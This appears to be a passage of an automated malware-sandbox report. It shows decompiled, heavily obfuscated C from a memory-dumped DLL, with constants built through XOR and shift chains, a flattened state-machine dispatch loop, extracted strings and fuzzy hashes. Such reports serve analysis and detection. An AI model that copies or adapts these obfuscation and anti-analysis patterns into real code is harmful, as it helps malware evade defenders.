				_v264 = _v264 << 0xe;
				_v264 = _v264 ^ 0xf64b59f7;
				_v172 = 0x9e87dc;
				_t1052 = 0xe;
				_v172 = _v172 / _t1052;
				_v172 = _v172 ^ 0x0007dfeb;
				_v384 = 0x34a85e;
				_v384 = _v384 ^ 0x4f5c876b;
				_v384 = _v384 | 0x534f9a09;
				_v384 = _v384 ^ 0x652190bf;
				_v384 = _v384 ^ 0x3a47b4b9;
				_v392 = 0x52b71a;
				_v392 = _v392 + 0xb813;
				_t946 = 3;
				_v392 = _v392 / _t946;
				_t1047 = 0x4e;
				_v392 = _v392 * 0x3b;
				_v392 = _v392 ^ 0x06606f01;
				_v164 = 0x818bb3;
				_v164 = _v164 / _t1047;
				_v164 = _v164 ^ 0x000d4498;
				_v376 = 0x1d853d;
				_v376 = _v376 << 0xf;
				_v376 = _v376 * 0x33;
				_v376 = _v376 ^ 0x21d65b76;
				_v376 = _v376 ^ 0xe44ce741;
				_v256 = 0x686697;
				_v256 = _v256 << 0xb;
				_v256 = _v256 ^ 0x6b76af8a;
				_v256 = _v256 ^ 0x28466fc5;
				_v352 = 0x800704;
				_v352 = _v352 >> 3;
				_v352 = _v352 * 0x72;
				_v352 = _v352 + 0x85b;
				_v352 = _v352 ^ 0x072a7fae;
				_v148 = 0x3bd8a1;
				_v148 = _v148 >> 6;
				_v148 = _v148 ^ 0x0002fab0;
				_v156 = 0xb010b0;
				_v156 = _v156 + 0xffff92be;
				_v156 = _v156 ^ 0x00a20522;
				_v240 = 0xa7b2b6;
				_v240 = _v240 * 0x63;
				_v240 = _v240 >> 6;
				_v240 = _v240 ^ 0x010c9a88;
				_v248 = 0x2ea01c;
				_v248 = _v248 ^ 0xe2dba7b2;
				_v248 = _v248 ^ 0x0c695d9d;
				_v248 = _v248 ^ 0xee940bd9;
				_v344 = 0x8efbcc;
				_v344 = _v344 + 0x494;
				_v344 = _v344 | 0x6c0f137b;
				_v344 = _v344 * 0x6f;
				_v344 = _v344 ^ 0x120c127b;
				_v168 = 0x323069;
				_t947 = 0x6d;
				_v168 = _v168 / _t947;
				_v168 = _v168 ^ 0x000b2845;
				_v120 = 0x72035e;
				_v120 = _v120 ^ 0x17e5b3b7;
				_v120 = _v120 ^ 0x179cf85d;
				_v176 = 0x56dc;
				_v176 = _v176 ^ 0x4cad57cf;
				_v176 = _v176 ^ 0x4caa6a55;
				_v324 = 0xb8a430;
				_t948 = 0x36;
				_v324 = _v324 / _t948;
				_v324 = _v324 | 0x82e745bd;
				_v324 = _v324 ^ 0x82e06743;
				_v160 = 0xbf64eb;
				_v160 = _v160 * 0x7f;
				_v160 = _v160 ^ 0x5ef13a82;
				_v316 = 0xaabadb;
				_v316 = _v316 | 0xc69eedbc;
				_v316 = _v316 * 0x2e;
				_v316 = _v316 ^ 0xb6547561;
				_v104 = 0xce123e;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x000e3af1;
				_v276 = 0xdb7417;
				_v276 = _v276 * 0x4a;
				_v276 = _v276 / _t1052;
				_v276 = _v276 ^ 0x04854fb8;
				_v308 = 0xd0f409;
				_v308 = _v308 ^ 0xa3964ce2;
				_v308 = _v308 + 0x35be;
				_v308 = _v308 ^ 0xa344799f;
				_v252 = 0xd9b17a;
				_v252 = _v252 + 0xffff396f;
				_v252 = _v252 ^ 0x9e4fdfc8;
				_v252 = _v252 ^ 0x9e907113;
				_v428 = 0x2ee6d6;
				_v428 = _v428 | 0x7d1d46be;
				_v428 = _v428 >> 8;
				_v428 = _v428 * 0x34;
				_v428 = _v428 ^ 0x1979bd5d;
				_v236 = 0x2c7c3b;
				_v236 = _v236 << 8;
				_v236 = _v236 + 0xffffee4c;
				_v236 = _v236 ^ 0x2c75c73d;
				_v380 = 0xac6ca;
				_v380 = _v380 + 0xffffc7da;
				_v380 = _v380 + 0x30d6;
				_v380 = _v380 << 4;
				_v380 = _v380 ^ 0x00abb9fc;
				_v420 = 0xb23374;
				_v420 = _v420 / _t1047;
				_v420 = _v420 >> 8;
				_v420 = _v420 | 0xe03aad61;
				_v420 = _v420 ^ 0xe033d3a2;
				_v364 = 0xb43a20;
				_v364 = _v364 | 0x3b06eb58;
				_v364 = _v364 << 1;
				_v364 = _v364 << 0x10;
				_v364 = _v364 ^ 0xf6f1394f;
				_v300 = 0xa5acb8;
				_t949 = 7;
				_v300 = _v300 / _t949;
				_v300 = _v300 | 0x99921af1;
				_v300 = _v300 ^ 0x99957053;
				_v112 = 0x72625b;
				_v112 = _v112 << 0xd;
				_v112 = _v112 ^ 0x4c4adb57;
				_v124 = 0xd7993b;
				_v124 = _v124 ^ 0x21fd1d2c;
				_v124 = _v124 ^ 0x212f4cec;
				_v260 = 0x13a916;
				_v260 = _v260 ^ 0xd919ad1b;
				_v260 = _v260 + 0xc122;
				_v260 = _v260 ^ 0xd907ad2e;
				_v292 = 0x32efcd;
				_v292 = _v292 ^ 0xcf4f1923;
				_v292 = _v292 >> 0xf;
				_v292 = _v292 ^ 0x000825fc;
				_v412 = 0xc71bf1;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 | 0xbe1a6c54;
				_t1048 = 0x61;
				_v412 = _v412 / _t1048;
				_v412 = _v412 ^ 0x01fd7bd5;
				_v336 = 0xb55c31;
				_v336 = _v336 >> 0xe;
				_v336 = _v336 | 0xc48365c8;
				_v336 = _v336 ^ 0xc4852e6f;
				_v284 = 0x6be37;
				_v284 = _v284 + 0xffffcf01;
				_v284 = _v284 | 0x6b32a3a7;
				_v284 = _v284 ^ 0x6b3e3334;
				_v372 = 0xa1b227;
				_v372 = _v372 + 0xffff72ed;
				_v372 = _v372 + 0xffff0be8;
				_v372 = _v372 >> 0xa;
				_v372 = _v372 ^ 0x000d2f7c;
				_v404 = 0x768f98;
				_v404 = _v404 << 0xc;
				_v404 = _v404 >> 4;
				_v404 = _v404 >> 1;
				_v404 = _v404 ^ 0x03421cab;
				_v328 = 0xa4e430;
				_t950 = 0x2d;
				_v328 = _v328 / _t950;
				_v328 = _v328 + 0xffffb164;
				_v328 = _v328 ^ 0x0007a27e;
				_v348 = 0xd97d5c;
				_t1053 = 0x6b;
				_v348 = _v348 * 0x5d;
				_v348 = _v348 + 0xffff2619;
				_v348 = _v348 + 0xb5a5;
				_v348 = _v348 ^ 0x4f0e4207;
				_v320 = 0x4c05f0;
				_v320 = _v320 + 0x7ff1;
				_v320 = _v320 * 9;
				_v320 = _v320 ^ 0x02be9984;
				_v440 = 0x22af4b;
				_v440 = _v440 ^ 0x006eb25e;
				_v440 = _v440 / _t1053;
				_v440 = _v440 + 0xfffff78d;
				_v440 = _v440 ^ 0x00012875;
				_v220 = 0xd3da08;
				_v220 = _v220 | 0x34caaab9;
				_v220 = _v220 ^ 0x34d71f6a;
				_v448 = 0xe2aab3;
				_t951 = 0x76;
				_v448 = _v448 / _t951;
				_v448 = _v448 + 0xffffe3f8;
				_v448 = _v448 + 0xaeb7;
				_v448 = _v448 ^ 0x000e0a18;
				_v456 = 0xa8d79a;
				_v456 = _v456 + 0xffff8cd8;
				_v456 = _v456 + 0xffff9cb4;
				_v456 = _v456 + 0xffffa1ea;
				_v456 = _v456 ^ 0x00ae7e5a;
				_v432 = 0xd6a685;
				_v432 = _v432 + 0xffff9f28;
				_v432 = _v432 ^ 0x17bde7ef;
				_v432 = _v432 + 0x530b;
				_v432 = _v432 ^ 0x1766bd6e;
				_v312 = 0x39c23d;
				_v312 = _v312 + 0xd3d1;
				_v312 = _v312 + 0x6bfe;
				_v312 = _v312 ^ 0x0039d4bf;
				_v204 = 0xd5e86f;
				_t952 = 0x28;
				_v204 = _v204 / _t952;
				_v204 = _v204 ^ 0x00047e54;
				_v340 = 0xf37bc2;
				_v340 = _v340 >> 0xb;
				_v340 = _v340 << 7;
				_v340 = _v340 ^ 0x0008f5d4;
				_v416 = 0x341de4;
				_v416 = _v416 ^ 0xe607b6cd;
				_v416 = _v416 ^ 0x46288343;
				_v416 = _v416 + 0xffffd875;
				_v416 = _v416 ^ 0xa01c5e1e;
				_v424 = 0x35203e;
				_v424 = _v424 + 0xffffede2;
				_v424 = _v424 | 0x40d6829e;
				_v424 = _v424 >> 2;
				_v424 = _v424 ^ 0x103f2b9e;
				_v304 = 0xbd0ff7;
				_v304 = _v304 >> 3;
				_t953 = 0x11;
				_v304 = _v304 / _t953;
				_v304 = _v304 ^ 0x0001f385;
				_v332 = 0x4f41e3;
				_v332 = _v332 ^ 0x0053c3b5;
				_v332 = _v332 ^ 0xfca397ab;
				_v332 = _v332 ^ 0xfcbc3313;
				_v200 = 0x6c7772;
				_v200 = _v200 + 0xffff701a;
				_v200 = _v200 ^ 0x00668e8f;
				_v296 = 0xc1deb9;
				_v296 = _v296 | 0x5f5b6add;
				_v296 = _v296 ^ 0x5fda681e;
				_v452 = 0x54ea55;
				_v452 = _v452 | 0xd5ea105b;
				_v452 = _v452 ^ 0x9b86284b;
				_t954 = 0x77;
				_v452 = _v452 / _t954;
				_v452 = _v452 ^ 0x00a5353d;
				_v128 = 0x28b86;
				_t955 = 0x57;
				_v88 = 0x20;
				_v128 = _v128 / _t955;
				_v128 = _v128 ^ 0x000ddecb;
				_v444 = 0x7f431d;
				_t956 = 0x53;
				_v444 = _v444 * 0x5c;
				_v444 = _v444 / _t956;
				_v444 = _v444 ^ 0x3e22c788;
				_v444 = _v444 ^ 0x3ea23fc6;
				_v192 = 0x9eaae3;
				_v192 = _v192 + 0xffffca5b;
				_v192 = _v192 ^ 0x009874bd;
				_v108 = 0x85b0a5;
				_v108 = _v108 ^ 0xbd32f60f;
				_v108 = _v108 ^ 0xbdbceef5;
				_v228 = 0xdf263f;
				_v228 = _v228 >> 9;
				_v228 = _v228 ^ 0x0003b164;
				_v136 = 0xa213a4;
				_t1054 = 0x5b3ff98;
				_v136 = _v136 / _t1053;
				_v136 = _v136 ^ 0x000eb67d;
				_v208 = 0xd62b6a;
				_v208 = _v208 + 0x8de2;
				_v208 = _v208 ^ 0x00d4eee1;
				_v116 = 0x750a32;
				_v116 = _v116 << 8;
				_v116 = _v116 ^ 0x75008874;
				_v100 = 0xbd9a2e;
				_v100 = _v100 + 0xffff4f76;
				_v100 = _v100 ^ 0x00b1baf4;
				_v244 = 0x614963;
				_v244 = _v244 >> 3;
				_v244 = _v244 * 0x76;
				_v244 = _v244 ^ 0x059f313e;
				_v184 = 0xc12472;
				_v184 = _v184 * 0x69;
				_v184 = _v184 ^ 0x4f315960;
				_v408 = 0x414bf;
				_v408 = _v408 | 0xd73b0429;
				_t1049 = 0x97177ca;
				_v408 = _v408 / _t1048;
				_v408 = _v408 * 0x6c;
				_v408 = _v408 ^ 0xefa0f1ab;
				_v288 = 0x22d581;
				_v288 = _v288 ^ 0xbd925b10;
				_v288 = _v288 + 0xffff129a;
				_v288 = _v288 ^ 0xbdaf1526;
				_v188 = 0xf02630;
				_v188 = _v188 << 5;
				_v188 = _v188 ^ 0x1e0679a5;
				_v196 = 0xca4e0f;
				_v196 = _v196 + 0x4522;
				_v196 = _v196 ^ 0x00cc2cd1;
				_v232 = 0x71a845;
				_v232 = _v232 * 0x38;
				_v232 = _v232 >> 1;
				_v232 = _v232 ^ 0x0c6d1fe5;
				_v140 = 0x61ba94;
				_v140 = _v140 + 0xffffb8e6;
				_v140 = _v140 ^ 0x00637830;
				while(1) {
					L1:
					_t957 = 0x432e732;
					_t1027 = 0x2037cff;
					_t893 = 0x95e39da;
					do {
						while(1) {
							L2:
							_t1066 = _t938 - _t893;
							if(_t1066 > 0) {
								break;
							}
							if(_t1066 == 0) {
								_push(_t957);
								_t910 = E100134E7(_t957,  *((intOrPtr*)( *0x10025218 + 0x54)));
								_t1061 =  &(_t1061[3]);
								_t938 =  !=  ? _t1054 : _t1049;
								 *((intOrPtr*)( *0x10025218 + 0x50)) = _t910;
								while(1) {
									L1:
									_t957 = 0x432e732;
									_t1027 = 0x2037cff;
									_t893 = 0x95e39da;
									goto L2;
								}
							} else {
								if(_t938 == _t1027) {
									_push(_v348);
									_push(_v328);
									_push(_v404);
									E10004881( *0x10025218 + 0x54,  &_v92, E1000416C(_v372, 0x10001020), _v320, _v440, _v220, _v448, _v372, _v224, _v96, _v456);
									_t938 =  ==  ? 0x95e39da : _t1049;
									E1000B952(_v432, _t912, _v312, _v204);
									_t1061 =  &(_t1061[0xe]);
									goto L15;
								} else {
									if(_t938 == _t957) {
										_push(_v324);
										_push(_v176);
										_push(_v120);
										_t917 = E1000416C(_v168, 0x10001000);
										_push(_v276);
										_t1050 = _t917;
										_push(_v104);
										_push(_v316);
										_t918 = E1000416C(_v160, 0x100010d0);
										_v76 = _v388;
										_t920 = E100047C5(_v308, _v428, _t1050);
										_v68 = _v68 & 0x00000000;
										_v92 = _v88;
										_v80 = 2 + _t920 * 2;
										_v60 =  &_v80;
										_v72 = _t1050;
										_v64 = 1;
										E10010D4F( &_v92, _v236, _v380, _v420, _v364,  &_v32, _v84, _t918, _v88, _v300, _v268,  &_v68, _v112);
										_t938 =  ==  ? 0x2037cff : 0x97177ca;
										E1000B952(_v124, _t1050, _v260, _v292);
										E1000B952(_v412, _t918, _v336, _v284);
										_t1061 =  &(_t1061[0x17]);
										L14:
										_t1049 = 0x97177ca;
										L15:
										_t1054 = 0x5b3ff98;
										goto L25;
									} else {
										if(_t938 == 0x5a81e65) {
											_t938 = 0xae935ca;
											continue;
										} else {
											if(_t938 == _t1054) {
												_push(_v452);
												_push(_v296);
												_push(_v200);
												_t982 = _v332;
												_t1058 = E1000416C(_v332, 0x10001150);
												_v44 = _v144;
												_v40 = _v216;
												_v36 = _v396;
												_t936 = E10017908(_v356, _v128, _t930, _v444, _v192, _v96, _v332,  *((intOrPtr*)( *0x10025218 + 0x50)),  *((intOrPtr*)( *0x10025218 + 0x54)), _v332,  &_v44, _v108, _t982, _v228, _v136, _v208, _v116);
												_t1061 =  &(_t1061[0x12]);
												if(_t936 != _v436) {
													_t938 = 0xcae305b;
												} else {
													_t938 = _t1049;
													_t1059 = 1;
												}
												E1000B952(_v100, _t1058, _v244, _v184);
												_t1054 = 0x5b3ff98;
												L24:
												L25:
												_t893 = 0x95e39da;
												_t957 = 0x432e732;
												_t1027 = 0x2037cff;
											}
										}
									}
								}
							}
							goto L26;
						}
						if(_t938 == _t1049) {
							_t828 =  &_v140; // 0x637830
							E1000C1CB(_v232, _v96, _v132,  *_t828);
							_t938 = 0x59fc350;
							goto L24;
						} else {
							if(_t938 == 0xae935ca) {
								_t808 =  &_v280; // 0x6b3e3334
								_push( *_t808);
								_push(_v272);
								_push(_v180);
								_t896 = E1000416C(_v400, 0x100010b0);
								_push(_v392);
								_push(_v384);
								_push(_v172);
								E1001E1AC(_v164,  &_v96, _v368, _t896, _v376, _v256, E1000416C(_v264, 0x10001040));
								_t938 =  ==  ? 0x432e732 : 0x59fc350;
								E1000B952(_v352, _t896, _v148, _v156);
								E1000B952(_v240, _t897, _v248, _v344);
								_t1061 =  &(_t1061[0xf]);
								goto L14;
							} else {
								if(_t938 == 0xcae305b) {
									E100088FC(_v408, _v288, _v188, _v196,  *((intOrPtr*)( *0x10025218 + 0x50)));
									_t1061 =  &(_t1061[3]);
									_t938 = _t1049;
									goto L1;
								}
							}
						}
						L26:
					} while (_t938 != 0x59fc350);
					return _t1059;
				}
			}

0x10002c79
0x10002c7f
0x10002c8c
0x10002c99
0x10002c9b
0x10002ca2
0x10002ca9
0x10002cae
0x10002cb9
0x10002cc4
0x10002ccf
0x10002ce5
0x10002cea
0x10002cf3
0x10002cfe
0x10002d06
0x10002d13
0x10002d14
0x10002d18
0x10002d1d
0x10002d25
0x10002d2d
0x10002d35
0x10002d3a
0x10002d42
0x10002d4a
0x10002d52
0x10002d5a
0x10002d62
0x10002d6a
0x10002d72
0x10002d7d
0x10002d85
0x10002d90
0x10002d9b
0x10002da6
0x10002dae
0x10002db9
0x10002dc4
0x10002dcf
0x10002dda
0x10002ded
0x10002df4
0x10002dff
0x10002e0c
0x10002e10
0x10002e18
0x10002e1d
0x10002e25
0x10002e2d
0x10002e32
0x10002e37
0x10002e3f
0x10002e47
0x10002e5b
0x10002e62
0x10002e6d
0x10002e75
0x10002e7d
0x10002e85
0x10002e8a
0x10002e92
0x10002e9a
0x10002e9f
0x10002ea7
0x10002eaf
0x10002eb7
0x10002ec2
0x10002ecf
0x10002eda
0x10002ee5
0x10002eed
0x10002ef5
0x10002f00
0x10002f0b
0x10002f16
0x10002f1e
0x10002f29
0x10002f34
0x10002f3f
0x10002f47
0x10002f52
0x10002f66
0x10002f6b
0x10002f74
0x10002f7f
0x10002f87
0x10002f8f
0x10002f97
0x10002f9f
0x10002fa7
0x10002faf
0x10002fbb
0x10002fc0
0x10002fcb
0x10002fcc
0x10002fd0
0x10002fd8
0x10002fec
0x10002ff3
0x10002ffe
0x10003006
0x10003010
0x10003014
0x1000301c
0x10003024
0x1000302f
0x10003037
0x10003042
0x1000304d
0x10003055
0x1000305f
0x10003063
0x1000306b
0x10003073
0x1000307e
0x10003086
0x10003091
0x1000309c
0x100030a7
0x100030b2
0x100030c5
0x100030cc
0x100030d4
0x100030df
0x100030ea
0x100030f5
0x10003100
0x1000310b
0x10003116
0x10003121
0x10003134
0x1000313d
0x10003148
0x1000315c
0x10003161
0x10003168
0x10003173
0x1000317e
0x10003189
0x10003194
0x1000319f
0x100031aa
0x100031b5
0x100031c9
0x100031ce
0x100031d5
0x100031e0
0x100031eb
0x100031fe
0x10003205
0x10003210
0x1000321b
0x1000322e
0x10003235
0x10003240
0x1000324b
0x10003253
0x1000325e
0x10003271
0x10003283
0x1000328a
0x10003295
0x100032a0
0x100032ab
0x100032b6
0x100032c1
0x100032cc
0x100032d7
0x100032e2
0x100032ed
0x100032f5
0x100032fd
0x10003307
0x1000330b
0x10003313
0x1000331e
0x10003326
0x10003331
0x1000333c
0x10003344
0x1000334c
0x10003354
0x10003359
0x10003361
0x1000336f
0x10003373
0x10003378
0x10003380
0x10003388
0x10003390
0x10003398
0x1000339c
0x100033a1
0x100033a9
0x100033bf
0x100033c4
0x100033cd
0x100033d8
0x100033e3
0x100033ee
0x100033f6
0x10003401
0x1000340c
0x10003417
0x10003422
0x1000342d
0x10003438
0x10003443
0x1000344e
0x10003459
0x10003464
0x1000346c
0x10003477
0x1000347f
0x10003484
0x10003490
0x10003495
0x1000349b
0x100034a3
0x100034ae
0x100034b6
0x100034c1
0x100034cc
0x100034d7
0x100034e2
0x100034ed
0x100034f8
0x10003500
0x10003508
0x10003510
0x10003515
0x1000351d
0x10003525
0x1000352a
0x1000352f
0x10003533
0x1000353b
0x1000354d
0x10003552
0x1000355b
0x10003566
0x10003571
0x10003584
0x10003585
0x10003589
0x10003591
0x10003599
0x100035a1
0x100035ac
0x100035bf
0x100035c6
0x100035d1
0x100035d9
0x100035e7
0x100035eb
0x100035f3
0x100035fb
0x10003608
0x10003613
0x1000361e
0x1000362c
0x10003631
0x10003637
0x1000363f
0x10003647
0x1000364f
0x10003657
0x1000365f
0x10003667
0x1000366f
0x10003677
0x1000367f
0x10003687
0x1000368f
0x10003697
0x1000369f
0x100036aa
0x100036b5
0x100036c0
0x100036cb
0x100036dd
0x100036e2
0x100036eb
0x100036f6
0x10003701
0x10003709
0x10003711
0x1000371c
0x10003724
0x1000372c
0x10003734
0x1000373c
0x10003744
0x1000374c
0x10003754
0x1000375c
0x10003761
0x10003769
0x10003774
0x10003783
0x10003788
0x10003791
0x1000379c
0x100037a7
0x100037b2
0x100037bd
0x100037c8
0x100037d3
0x100037de
0x100037e9
0x100037f4
0x100037ff
0x1000380a
0x10003812
0x1000381a
0x10003826
0x10003829
0x1000382d
0x10003837
0x1000384b
0x10003850
0x1000385b
0x10003862
0x1000386d
0x1000387c
0x1000387d
0x10003889
0x1000388d
0x10003895
0x1000389d
0x100038a8
0x100038b3
0x100038be
0x100038c9
0x100038d4
0x100038df
0x100038ea
0x100038f2
0x100038fd
0x10003913
0x10003918
0x1000391f
0x1000392a
0x10003935
0x10003940
0x1000394b
0x10003956
0x1000395e
0x10003969
0x10003974
0x1000397f
0x1000398a
0x10003995
0x100039a5
0x100039ac
0x100039b7
0x100039ca
0x100039d1
0x100039dc
0x100039e4
0x100039f2
0x100039f7
0x10003a00
0x10003a04
0x10003a0c
0x10003a17
0x10003a22
0x10003a2d
0x10003a38
0x10003a43
0x10003a4b
0x10003a56
0x10003a61
0x10003a6c
0x10003a77
0x10003a8a
0x10003a91
0x10003a98
0x10003aa3
0x10003aae
0x10003ab9
0x10003ac4
0x10003ac4
0x10003ac4
0x10003ac9
0x10003ace
0x10003ad3
0x10003ad3
0x10003ad3
0x10003ad3
0x10003ad5
0x00000000
0x00000000
0x10003adb
0x10003e16
0x10003e1b
0x10003e22
0x10003e2e
0x10003e31
0x10003ac4
0x10003ac4
0x10003ac4
0x10003ac9
0x10003ace
0x00000000
0x10003ace
0x10003ae1
0x10003ae3
0x10003d64
0x10003d6d
0x10003d74
0x10003dc0
0x10003deb
0x10003dee
0x10003df3
0x00000000
0x10003ae9
0x10003aeb
0x10003bf8
0x10003c04
0x10003c0b
0x10003c19
0x10003c1e
0x10003c2a
0x10003c2c
0x10003c33
0x10003c41
0x10003c5f
0x10003c66
0x10003c79
0x10003c88
0x10003c8f
0x10003c9d
0x10003cba
0x10003cc8
0x10003cfd
0x10003d23
0x10003d34
0x10003d4d
0x10003d52
0x10003d55
0x10003d55
0x10003d5a
0x10003d5a
0x00000000
0x10003af1
0x10003af7
0x10003bee
0x00000000
0x10003afd
0x10003aff
0x10003b05
0x10003b0e
0x10003b15
0x10003b1c
0x10003b2b
0x10003b34
0x10003b42
0x10003b54
0x10003bae
0x10003bb3
0x10003bba
0x10003bc3
0x10003bbc
0x10003bbe
0x10003bc0
0x10003bc0
0x10003bdf
0x10003be4
0x10003f74
0x10003f76
0x10003f76
0x10003f7b
0x10003f80
0x10003f80
0x10003aff
0x10003af7
0x10003aeb
0x10003ae3
0x00000000
0x10003adb
0x10003e3b
0x10003f4e
0x10003f6a
0x10003f6f
0x00000000
0x10003e41
0x10003e47
0x10003e85
0x10003e85
0x10003e91
0x10003e98
0x10003ea3
0x10003ea8
0x10003eb3
0x10003eb7
0x10003ef1
0x10003f22
0x10003f25
0x10003f41
0x10003f46
0x00000000
0x10003e49
0x10003e4f
0x10003e76
0x10003e7b
0x10003e7e
0x00000000
0x10003e7e
0x10003e4f
0x10003e47
0x10003f85
0x10003f85
0x10003f9d
0x10003f9d

Strings

UT, xrefs: 1000380A
"E, xrefs: 10003A61
AO, xrefs: 1000379C
i02, xrefs: 10003148
0xc, xrefs: 10003F4E
43>k, xrefs: 10003E85
AL, xrefs: 1000301C
;|,, xrefs: 10003313
nij, xrefs: 10002C7F
r., xrefs: 10002E62
cIa, xrefs: 1000398A
/, xrefs: 10002EC2
> 5, xrefs: 10003744
L/!, xrefs: 10003417
rwl, xrefs: 100037C8
`Y1O, xrefs: 100039D1
2u, xrefs: 1000394B
|/, xrefs: 10003515
[br, xrefs: 100033E3
, xrefs: 10003850

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: $"E$/$0xc$2u$43>k$;|,$> 5$AL$UT$[br$`Y1O$cIa$i02$nij$r.$rwl$|/$AO$L/!
API String ID: 0-409976011
Opcode ID: 69810da82da5a8c5711ecc25d668f235f35a1350f70c98c17f394337943a3d40
Instruction ID: 3bd40601ba52d22aded13ecff919c7b5a0ef005af1e438180cb5fd5c968a8b53
Opcode Fuzzy Hash: 69810da82da5a8c5711ecc25d668f235f35a1350f70c98c17f394337943a3d40
Instruction Fuzzy Hash: 7192EF715093818FD3B9CF25C58AB8BBBE2FBC5344F10891DE2DA86260D7B19949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10012378, Relevance: 19.5, Strings: 15, Instructions: 723
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E10012378(signed int __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				void* _t844;
				void* _t847;
				intOrPtr _t848;
				intOrPtr _t867;
				intOrPtr _t869;
				intOrPtr _t874;
				intOrPtr* _t879;
				signed int _t889;
				void* _t892;
				void* _t943;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				char _t977;
				signed int _t978;
				signed int _t980;
				char _t985;
				signed int* _t987;
				void* _t989;

				_push(_a40);
				_push(_a36 & 0x0000ffff);
				_push(_a32);
				_v4 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_a36 & 0x0000ffff);
				_v288 = 0xa2ba67;
				_t987 =  &(( &_v288)[0xc]);
				_v288 = _v288 << 2;
				_v288 = _v288 + 0xfecd;
				_t874 = 0;
				_v288 = _v288 << 1;
				_t978 = 0x20a3cfe;
				_v288 = _v288 ^ 0x0517d0d2;
				_v240 = 0x67a73e;
				_v240 = _v240 | 0x53e63a3a;
				_v240 = _v240 ^ 0x7fb36030;
				_v240 = _v240 << 0xb;
				_v240 = _v240 ^ 0xa6f87013;
				_v176 = 0x3f0ac6;
				_v176 = _v176 >> 5;
				_t960 = 0x41;
				_v16 = 0;
				_v176 = _v176 / _t960;
				_v176 = _v176 ^ 0xb579b0a3;
				_v176 = _v176 ^ 0xb579b7a9;
				_v268 = 0x61a5d8;
				_v268 = _v268 + 0xcce0;
				_v268 = _v268 >> 0xb;
				_v268 = _v268 ^ 0x474e3643;
				_v268 = _v268 ^ 0x474eba0d;
				_v148 = 0x564681;
				_v148 = _v148 + 0x3d30;
				_v148 = _v148 ^ 0x48a5103f;
				_v148 = _v148 ^ 0x48f3d38e;
				_v116 = 0xbdc737;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x98e80a14;
				_v116 = _v116 ^ 0x93747964;
				_v48 = 0x999b3f;
				_v48 = _v48 << 0xf;
				_v48 = _v48 ^ 0xcd9b8000;
				_v272 = 0x867a60;
				_v272 = _v272 + 0x8fc7;
				_v272 = _v272 | 0xdbe8bea6;
				_v272 = _v272 << 0xd;
				_v272 = _v272 ^ 0xf3d4e000;
				_v216 = 0x9ba1ec;
				_v216 = _v216 >> 0xc;
				_v216 = _v216 ^ 0x255f794d;
				_v216 = _v216 + 0xd238;
				_v216 = _v216 ^ 0x2568432f;
				_v276 = 0xfe54a3;
				_t961 = 0xa;
				_v276 = _v276 / _t961;
				_v276 = _v276 ^ 0xacb4d67c;
				_v276 = _v276 + 0xffffe118;
				_v276 = _v276 ^ 0xacad9bb9;
				_v224 = 0x80baf2;
				_v224 = _v224 << 0xb;
				_t962 = 0x2a;
				_v224 = _v224 * 0x76;
				_v224 = _v224 >> 0xf;
				_v224 = _v224 ^ 0x000163b8;
				_v20 = 0xde826f;
				_v20 = _v20 / _t962;
				_v20 = _v20 ^ 0x80054c3f;
				_v84 = 0xa8a37;
				_v84 = _v84 + 0xccae;
				_v84 = _v84 | 0x8cd27da4;
				_v84 = _v84 ^ 0x8cdb7fe5;
				_v112 = 0x1d5e6b;
				_t963 = 0x71;
				_v112 = _v112 / _t963;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x00002105;
				_v204 = 0x5f5010;
				_v204 = _v204 >> 0xc;
				_t964 = 0x24;
				_v204 = _v204 / _t964;
				_v204 = _v204 | 0x8a52e0b1;
				_v204 = _v204 ^ 0x8a52e0a4;
				_v188 = 0x7b5db1;
				_v188 = _v188 * 0x41;
				_v188 = _v188 >> 0xd;
				_v188 = _v188 + 0xccf6;
				_v188 = _v188 ^ 0x0001c793;
				_v36 = 0x2bbb24;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0xeec90003;
				_v52 = 0xee32f0;
				_v52 = _v52 * 0x25;
				_v52 = _v52 ^ 0x226d5db0;
				_v284 = 0x28d223;
				_v284 = _v284 << 0xb;
				_v284 = _v284 + 0x746c;
				_v284 = _v284 ^ 0x469ebc21;
				_v284 = 0xec4361;
